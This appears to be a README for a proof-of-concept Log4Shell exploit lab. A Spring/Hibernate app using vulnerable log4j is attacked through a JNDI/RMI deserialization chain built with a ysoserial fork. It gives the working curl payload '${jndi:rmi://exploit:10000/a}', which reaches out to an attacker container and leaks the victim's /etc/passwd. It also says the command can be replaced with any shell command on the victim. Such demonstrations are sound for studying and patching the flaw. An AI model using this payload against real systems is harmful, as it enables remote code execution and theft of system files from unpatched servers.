This POC uses Spring / Hibernate, however a similar approach of rmi -> deserialization could be used to trigger any deserialization vulnerability
$ docker-compose up
$ curl -X POST -H 'Content-Type: text/plain' localhost:8080 --data-binary '${jndi:rmi://exploit:10000/a}'You should see the contents of the victim's /etc/passwd appear in the logs of the attacker container.
You can replace the command in the exploit service to run any shell command on the victim.
The victim is running a standard starter spring app with the "Spring Data JPA" (for Hibernate), "Spring Web", and "H2" (as a data store) dependencies. Only 2 modifications have been made on top of this
- Removed tests
- Replaced the
slf4jlogger with the vulnerablelog4j
All dependencies are up to date. There are no magic flags enabled.
The victim exposes a POST-able endpoint on / which will log the request.
The exploit relies on a fork of ysoserial using the Hibernate exploit generator. In order to have the exploit to work with the latest version of hibernate we will need to recompile ysoserial.